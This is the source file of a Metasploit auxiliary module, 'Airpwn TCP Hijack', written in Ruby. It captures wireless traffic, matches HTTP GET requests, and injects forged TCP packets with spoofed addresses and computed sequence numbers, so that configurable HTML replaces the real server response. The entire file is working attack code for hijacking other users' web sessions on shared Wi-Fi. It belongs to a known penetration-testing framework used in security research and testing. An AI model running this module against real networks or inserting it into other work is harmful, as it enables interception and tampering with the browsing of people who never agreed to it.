metasploit-framework/modules/auxiliary/spoof/wifi/airpwn.rb

197 lines
5.7 KiB
Ruby
Raw Normal View History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'yaml'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Airpwn TCP Hijack',
'Description' => %q{
TCP streams are 'protected' only in so much as the sequence
number is not guessable.
Wifi is shared media.
Got your nose.
Responses which do not begin with Header: Value assumed to be
HTML only and will have Header:Value data prepended. Responses
which do not include a Content-Length header will have one generated.
},
'Author' => ['toast', 'dragorn', 'ddz', 'hdm'],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Airpwn' ]
],
'PassiveActions' =>
[
'Capture'
],
'DefaultAction' => 'Airpwn'
)
register_options(
[
OptPath.new('SITELIST', [ false, "YAML file of URL/Replacement pairs for GET replacement",
File.join(Msf::Config.install_root, "data", "exploits", "wifi", "airpwn", "sitelist.yml")
]),
OptBool.new('USESITEFILE', [ true, "Use site list file for match/response", "false"]),
OptString.new('FILTER', [ true, "Default BPF filter", "port 80"]),
OptString.new('MATCH', [ true, "Default request match", "GET ([^ ?]+) HTTP" ]),
OptString.new('RESPONSE', [ true, "Default response", "Airpwn" ]),
], self.class)
end
def run
@sitelist = datastore['SITELIST']
@regex = datastore['MATCH']
@response = datastore['RESPONSE']
@filter = datastore['FILTER']
@useyaml = datastore['USESITEFILE']
@http = []
if @useyaml then
begin
@http = YAML::load_file(@sitelist)
rescue ::Exception => e
print_error "AIRPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}"
end
else
@http[0] = { "regex" => [@regex], "response" => @response }
end
@run = true
print_status "AIRPWN: Parsing responses and defining headers"
# Prep the responses
@http.each do |r|
if not r["response"] then
if not r["file"] then
print_error "AIRPWN: Missing 'response' or 'file' in yaml config"
r["txresponse"] = ""
else
r["txresponse"] = ""
begin
File.open(r["file"], "rb") do |io|
r["txresponse"] += io.read(4096)
end
rescue EOFError
rescue ::Exception => e
print_error("AIRPWN: failed to parse response file " +
"#{r['file']}, #{e.class} #{e} #{e.backtrace}")
end
end
else
if r["file"] then
print_error "AIRPWN: Both 'response' and 'file' in yaml config, " +
"defaulting to 'response'"
end
r["txresponse"] = r["response"]
end
# If we have headers
if r["txresponse"].scan(/[^:?]+: .+\n/m).size > 0
# But not a content-length
if r["txresponse"].scan(/^Content-Length: /).size == 0
# Figure out the length and add it
loc = (/\n\n/m =~ r["txresponse"])
if loc == nil
print_status "AIRPWN: Response packet looks like HTTP headers but can't find end of headers. Will inject as-is."
else
print_status "AIRPWN: Response packet looks like HTTP headers but has no Content-Length, adding one."
r["txresponse"].insert(loc, "\r\nContent-Length: " + (r["response"].length - loc).to_s)
end
end
else
# We have no headers, generate a response
print_status "AIRPWN: Response packet has no HTTP headers, creating some."
r["txresponse"].insert(0, "HTTP/1.1 200 OK\r\nDate: %s\r\nServer: Apache\r\nConnection: close\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n" % [Time.now, @response.size])
end
end
print_status "Opening wifi module."
open_wifi
self.wifi.filter = @filter if (@filter != "")
each_packet do |pkt|
d3 = pkt.dot3
next if not d3
p = PacketFu::Packet.parse(d3) rescue nil
next unless p.is_tcp?
@http.each do |r|
hit = nil
r['regex'].each do |reg|
hit = p.payload.scan(/#{reg}/) || nil
break if hit.size != 0
end
next if hit.size.zero?
print_status("AIRPWN: %s -> %s HTTP GET [%s] TCP SEQ %u" % [p.ip_saddr, p.ip_daddr, $1, p.tcp_seq])
injpkt = Lorcon::Packet.new()
injpkt.bssid = pkt.bssid
response_pkt = PacketFu::TCPPacket.new
response_pkt.eth_daddr = p.eth_saddr
response_pkt.eth_saddr = p.eth_daddr
response_pkt.ip_saddr = p.ip_daddr
response_pkt.ip_daddr = p.ip_saddr
response_pkt.ip_ttl = p.ip_ttl
response_pkt.tcp_sport = p.tcp_dport
response_pkt.tcp_dport = p.tcp_sport
response_pkt.tcp_win = p.tcp_win
response_pkt.tcp_seq = p.tcp_ack
response_pkt.tcp_ack = (p.tcp_seq + p.ip_header.body.to_s.size - (p.tcp_hlen * 4)) & 0xffffffff
response_pkt.tcp_flags.ack = 1
response_pkt.tcp_flags.psh = 1
response_pkt.payload = r["txresponse"]
response_pkt.recalc
injpkt.dot3 = response_pkt.to_s
case pkt.direction
when ::Lorcon::Packet::LORCON_FROM_DS
injpkt.direction = Lorcon::Packet::LORCON_TO_DS
when ::Lorcon::Packet::LORCON_TO_DS
injpkt.direction = Lorcon::Packet::LORCON_FROM_DS
else
injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS
end
self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error)
response_pkt.tcp_seq = response_pkt.tcp_seq + response_pkt.payload.size
response_pkt.tcp_flags.ack = 1
response_pkt.tcp_flags.psh = 0
response_pkt.tcp_flags.fin = 1
response_pkt.payload = 0
response_pkt.recalc
injpkt.dot3 = response_pkt.to_s
self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error)
end
end
end
end